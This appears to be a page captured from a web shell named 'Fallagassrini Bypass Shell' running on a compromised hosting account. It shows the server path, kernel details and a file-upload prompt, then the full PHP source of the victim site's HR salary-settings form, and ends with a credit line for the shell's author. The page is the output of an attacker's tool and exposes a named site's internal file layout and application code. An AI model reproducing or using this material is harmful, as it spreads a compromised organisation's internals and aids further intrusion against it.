? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/public_html/savoyglobal.net/sec/application/views/hr/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/public_html/savoyglobal.net/sec/application/views/hr/add_salary_setting.php

<?php
if (!defined('BASEPATH'))
    exit('No direct script access allowed');
$this->load->view('hr/hrfunctions');
$this->load->view('documentreadyfunctions');
$emplyee = $this->hrmodel->search_employee();
?>

<div class="row-fluid">
    <div class="tab-pane " id="tab_2">
        <div class="portlet box blue">
            <div class="portlet-title">
                <div class="caption"><i class="icon-reorder"></i>Add Salary Settings</div>
                <div class="tools">
                    <a href="#" onclick="viewdata('hr','viewinhrsearch','search_salary_setting','view_salary_setting','<?=$_SESSION['pagenum'];?>')" class="remove"></a>
                </div>
            </div>
            <div class="portlet-body form">
                <!-- BEGIN FORM-->
                <?php
                $attributes = array('id' => 'validateform', 'class' => 'form-horizontal validate');
                echo form_open('hr/addinhr/insert_salary_setting/view_salary_setting/1', $attributes);
                ?>
                <h3 class="form-section">Employee Salary Details</h3>
                <div class="row-fluid">
                    <div class="span6 ">
                        <div class="control-group">
                            <label class="control-label">Employee Name</label>
                            <div class="controls">
                                <select name="employee_id" class="required span12" id="employee_id">
                                    <option value="">--Select--</option>
                                    <?php
                                    foreach ($emplyee['results']->result_array() as $row)
                                    {
                                        ?>
                                        <option value="<?= $row['employee_id'] ?>"><?= $row['employee_name'] ?> </option>
                                        <?php
                                    }
                                    ?>
                                </select>
                            </div>
                        </div>
                    </div>
                    <div class="span6 ">
                        <div class="control-group">
                            <label class="control-label">W.E.F  Date</label>
                            <div class="controls">
                                <input class="span12 required calfocus" type="text" name="wef_date" id="wef_date"/>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="row-fluid">
                    <div class="span6 ">
                        <div class="control-group">
                            <label class="control-label">Basic Salary </label>
                            <div class="controls">
                                <input class="auto span12 required number" type="text" name="basic_salary" id="basic_salary" onblur="changebasicsalary(this.value)"/>

                            </div>
                        </div>
                    </div>
                </div>
                <h3 class="form-section">Annual Ticket Settings </h3>

                <div class="row-fluid">
                    <div class="span6 ">
                        <div class="control-group">
                            <label class="control-label">From:</label>
                            <div class="controls">
                                <input class="span12" type="text" name="from_ticket" id="from_ticket"/>           

                            </div>
                        </div>
                    </div>
                    <div class="span6 ">
                        <div class="control-group">
                            <label class="control-label">To: </label>
                            <div class="controls">
                                <input class="span12" type="text"  name="to_ticket" id="to_ticket">   
                            </div>
                        </div>
                    </div>
                </div>
                <div class="row-fluid">
                    <div class="span6 ">
                        <div class="control-group">
                            <label class="control-label">Return Ticket</label>
                            <div class="controls">
                                <?php echo form_checkbox('return_ticket', '1', TRUE); ?>
                            </div>
                        </div>
                    </div>
                    <div class="span6 ">
                        <div class="control-group">
                            <label class="control-label">No.of Tickets </label>
                            <div class="controls">
                                <input class="span12" type="text" style="width:70px;"  name="no_tickets" id="no_tickets">

                            </div>
                        </div>
                    </div>
                </div>
                
                        <h3 class="form-section"> Allowance/Deduction Details</h3>
                 
                                <table class="table table-striped table-hover table-bordered" id="sample_5" style="background-color: white;">
                                    <tr>
                                        <th>Title</th>
                                        <th>Mode</th>
                                        <th>Amount/Percentage</th>
                                        <th>Sub Total</th>
                                        <th>Type</th>
                                    </tr>
                                    <?php
                                    $i = 1;
                                    $dept = $this->mastermodel->get_data('allowdeduc', '1', 'allowdeduc_type', 'allowdeduc_id');
                                    foreach ($dept as $dep)
                                    {
                                        if ($dep['allowdeduc_mode'] == 1)
                                            $mode = " Direct Amount";
                                        else
                                            $mode = "Percentage";
                                        ?>
                                        <tr>
                                            <td><div class="allow_dedc"><?= $dep['allowdeduc_name']; ?><input type="hidden" value ="<?= $dep['allowdeduc_id']; ?>" name="allowdeduc_id_<?= $i; ?>"/> </div></td>
                                            <td><div class="allow_dedc"><?= $mode ?></div></td>
                                            <td>
                                                <input style="width:75px;float:left;" class="auto" type="text" name="amount_<?= $i; ?>" id="amount_<?= $i; ?>" onblur="calculteallowancetotal(this.value,<?= $dep['allowdeduc_mode'] ?>,<?= $i ?>)"/>
                                                <?php
                                                if ($dep['allowdeduc_mode'] == 0)
                                                {
                                                    ?>
                                                    <div style="float:left;margin: 5px;padding-top: 10px">%</div>
                                                    <?php
                                                }
                                                ?>
                                            </td>
                                            <td><input type="text"  class="auto" name="alltotal_<?= $i ?>" id="alltotal_<?= $i ?>" value="" readonly /></td>
                                            <td><div class="allow_dedc">Allowance</div></td>
                                        </tr>
                                        <?php
                                        $i++;
                                    }
                                    ?>
                                    <input type="hidden" name="allowcount" id="allowcount" value="<?= $i ?>" />
                                    <?php
                                    $dept = $this->mastermodel->get_data('allowdeduc', '0', 'allowdeduc_type', 'allowdeduc_id');
                                    foreach ($dept as $dep)
                                    {
                                        if ($dep['allowdeduc_mode'] == 1)
                                            $mode = "Direct Amount";
                                        else
                                            $mode = "Percentage";
                                        ?>
                                        <tr>
                                            <td><div class="allow_dedc"><?= $dep['allowdeduc_name']; ?><input type="hidden" value ="<?= $dep['allowdeduc_id']; ?>" name="allowdeduc_id_<?= $i; ?>"/></div></td>
                                            <td><div class="allow_dedc"><?= $mode ?></div></td>
                                            <td>
                                                <input type="text"  class="auto"  onblur="calcultedeductiontotal(this.value,<?= $dep['allowdeduc_mode'] ?>,<?= $i ?>)" name="amount_<?= $i ?>" id="amount_<?= $i ?>" style="width:75px;float:left;"/>
                                                <?php
                                                if ($dep['allowdeduc_mode'] == 0)
                                                {
                                                    ?>

                                                    <div style="float:left;margin: 5px;padding-top: 10px">%</div>

                                                    <?php
                                                }
                                                ?>
                                            </td>
                                            <td><input type="text"  class="auto" name="dedtotal_<?= $i ?>" id="dedtotal_<?= $i ?>" value="" readonly /></td>
                                            <td><div class="allow_dedc">Deduction</div></td>
                                        </tr>
                                        <?php
                                        $i++;
                                    }
                                    ?>
                                    <input type="hidden" name="dedcount" id="dedcount" value="<?= $i ?>" />
                                </table>
                           
              
                        <h3 class="form-section">   Salary Details</h3>
                   
                                <table class="table table-striped table-hover table-bordered" id="sample_5" style="background-color: white;">
                                    <tr>
                                        <th>Allowance</th>
                                        <th>Deduction</th>
                                    </tr>
                                    <tr>
                                        <td><input type="text"  class="auto" readonly style="width:80%" name="allowance" id="allowance" value="0"></td>
                                        <td><input type="text"  class="auto" style="width:80%" readonly name="deduction" id="deduction" value="0"></td>
                                    </tr>
                                    <tr>
                                        <th>Gross Salary</th>
                                        <th>Net Salary</th>
                                    </tr>
                                    <tr>
                                        <td><input type="text"  class="auto" readonly style="width:80%" name="grosssalary" id="grosssalary" value="0"></td>
                                        <td><input type="text"   class="auto" style="width:80%" readonly name="netsalary" id="netsalary" value="0"></td>
                                    </tr>
                                    <tr>
                                        <th>Payment Method</th>
                                        <td>
                                            <select name="payment_method" id="payment_method" class="required chosen auto" style="width:80%">
                                                <option value="">--Select--</option>
                                                <option value="Cheque">Cheque</option>
                                                <option value="cash">Cash</option>                            
                                            </select>
                                        </td>
                                    </tr>
                                </table>
                         
                <div class="portlet box blue">
                    <div class="portlet-title">
                        <div class="caption"><i class="icon-check"></i>  Insurance Details</div>
                    </div>
                    <div class="portlet-body">
                        <div class="row-fluid">
                            <div class="control-group">
                                <table class="table table-striped table-hover table-bordered" id="sample_5" style="background-color: white;">
                                    <tr>
                                        <th>Type of Insurance</th>
                                        <th>Insurance Company</th>
                                        <th>Policy No</th>
                                        <th>Plan Name</th>
                                        <th>Sum Insured</th> 
                                        <th><input type="button" id="button2" value="Add More" class="addRow" title="Add Row" style="width:75px;"/></th>
                                    </tr>
                                    <tr>
                                        <td><input type="text" style="width:70px;" id="type"  name="type" /></td>
                                        <td><input type="text" style="width:70px;"  name="company"id="company"/></td>
                                        <td><input type="text" style="width:70px;" id="policy"  name="policy"/></td>
                                        <td><input type="text" style="width:70px;" name="plan" id="plan"/></td>
                                        <td><input type="text" style="width:70px;" class="number" id="sum" name="sum" /></td>        
                                        <td>
                                            <img style="float: right; vertical-align: top;"src="<?= base_url() ?>assets/img/close.png" alt="Delete Row" class="delRow clickimage" title="Delete Row"/>
                                        </td>
                                    </tr>
                                </table>
                            </div>
                        </div>

                    </div>
                </div>




                <div class="form-actions">
                    <input type="hidden" name="tab_name" value="search_salary_setting"/>
                    <input type="hidden" name="resfunction" value="search_salary_setting"/>
                    <button type="submit" onclick="addformdata('validateform')" class="btn blue"><i class="icon-ok"></i> Save</button>
                    <button type="button" onclick="viewdata('hr','viewinhrsearch','search_salary_setting','view_salary_setting','<?= $_SESSION['pagenum']; ?>')" class="btn">Cancel</button>
                </div>
                <?php
                echo form_close();
                ?>
                <!-- END FORM-->                
            </div>
        </div>
    </div>
</div>





bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net